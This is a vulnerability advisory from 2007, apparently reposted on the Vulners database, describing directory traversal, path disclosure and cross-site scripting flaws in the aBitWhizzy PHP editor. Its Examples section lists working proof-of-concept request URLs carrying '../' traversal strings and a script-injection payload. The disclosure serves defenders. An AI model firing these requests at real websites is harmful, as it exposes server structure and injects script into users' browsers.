Vulners
Lucene search
abitwhizzy-traverse.txt
`################################################
aBitWhizzy traversal folder enumeration and XSS
vendor url: http://www.unverse.net/abitwhizzy/
Advisore:http://lostmon.blogspot.com/2007/03/
abitwhizzy-traversal-folder-enumeration.html
vendor notify:YES exploit include:YES
################################################
aBitWhizzy is a php script that uses whizzywig.js to create
and edit web pages through a WYSIWYG interface, right through
your browser. Now your site can be updated by people with no
knowledge of HTML, FTP or AIG (Abbreviations In General).
aBitWhizzy contains a flaw that allows a remote traversal
arbitrary folder enumeration.This flaw exists because the
application does not validate 'd' variable upon submission
to 'whizzylink.php','whizzypic.php','whizzery/whizzypic.php' and
'whizzery/whizzylink.php' scripts.This could allow a
remote users to create a specially crafted URL that would
execute '../' directory traversal characters to view folder
structure on the target system with the privileges
of the target web service.
This input validation error permits too Cross-site scripting
Style attacks and full path disclosure.
###################
VERSIONS
###################
Unknow version of aBitWhizzy
##################
SOLUTION
##################
No solutions was available at this time !!
######################
TIMELINE
######################
discovered:25-03-2007
vendor notify:25-03-2007
vendor response:---------
Private Disclosure:25-03-2007
public disclosure:27-03-2007
#######################
Examples
#######################
Path disclosure:
http://localhost/abitwhizzy/whizzylink.php?d='
http://localhost/abitwhizzy/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzypic.php?d='
http://localhost/abitwhizzy/whizzery/whizzylink.php?d='
Folder enumeration:
http://localhost/abitwhizzy/whizzylink.php?d=
../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzypic.php?d=
../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=
/../../../../../../../Documents%20and%20Settings
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=
/../../../../../../../Documents%20and%20Settings
Cross Site Scripting:
http://localhost/abitwhizzy/whizzery/whizzypic.php?d=
/../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>
http://localhost/abitwhizzy/whizzery/whizzylink.php?d=
/../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>
http://localhost/abitwhizzy/whizzypic.php?d=
../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>
http://localhost/abitwhizzy/whizzylink.php?d=
../../../../../../../Documents%20and%20Settings
"><SCRIPT>alert('XSS')</SCRIPT>
########################### nd ###################################
Thnx to estrella Que te ailoviuu un monton ;P
Thnx to all Lostmon´s Group Team
--
atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
--
atentamente:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Mar 2007 00:00Current
7.4High risk
Vulners AI Score7.4